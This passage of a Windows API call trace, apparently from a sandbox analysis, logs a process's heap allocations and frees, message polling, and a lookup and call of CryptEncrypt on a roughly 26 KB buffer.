hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0267.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0267.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0267.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0267.489] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6794) returned 0x2f2fe98 [0267.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0267.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6794) returned 0x2f36638 [0267.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0267.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0267.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2fe98 | out: hHeap=0x970000) returned 1 [0267.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f36638 | out: hHeap=0x970000) returned 1 [0267.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.491] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.491] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.491] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0267.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51c58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0267.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.492] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0267.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e543c8 [0267.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0267.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0267.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0267.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0267.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0267.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0267.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0267.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0267.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0267.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0267.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0267.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0267.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0267.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0267.502] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f296f8*, pdwDataLen=0x8cef60*=0x6794, dwBufLen=0x6798 | out: pbData=0x2f296f8*, pdwDataLen=0x8cef60*=0x6798) returned 1 [0267.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0267.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0267.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0267.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0267.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0267.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0267.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0267.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0267.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0267.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0267.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0267.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0267.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0267.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0267.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0267.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0267.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0267.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0267.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0267.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0267.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0267.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0267.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: hHeap=0x970000) returned 1 [0267.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0267.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0267.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0267.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0267.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55198 [0267.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0267.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0267.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0267.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0267.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0267.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0267.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0267.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0267.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0267.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0267.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6798) returned 0x2f2fe98 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0267.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: 